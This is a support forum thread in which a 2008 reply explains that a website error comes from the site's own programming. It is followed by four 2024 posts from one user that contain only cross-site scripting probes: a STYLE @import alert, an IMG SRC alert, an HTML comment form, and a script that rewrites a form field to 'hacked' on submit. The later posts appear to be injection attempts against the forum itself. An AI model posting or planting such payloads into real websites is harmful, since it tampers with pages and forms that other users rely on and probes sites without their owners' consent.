1.8K Posts

May 5th, 2008 15:00

It is an internal problem with the programming on the website you are trying to access.  There is nothing you can do on your end to get around it.  You can send email to the person(s) running the website with the error message and ask them to fix the programming, that's about all you can do.

1 Rookie

 • 

4 Posts

July 18th, 2024 22:45

"><STYLE>@import"alert('XSS')";</STYLE>

1 Rookie

 • 

4 Posts

July 18th, 2024 22:45

<IMG SRC="alert('XSS');">

1 Rookie

 • 

4 Posts

July 18th, 2024 22:46

<form action="/page.php" method="post" id="comment">
  <label for="name">Your name:</label>
  <input type="text" id="name" name="name">
  <label for "comment">Your comment:</label>
  <textarea id="comment" name="comment" rows="5" cols="30"></textarea>
  <button type="submit" form="comment" value="comment">Add a comment</button>
</form>

1 Rookie

 • 

4 Posts

July 18th, 2024 22:47

<script>document.forms[0].onsubmit = function() {document.forms[0].elements[0].value="hacked";}</script>

No Events found!

Top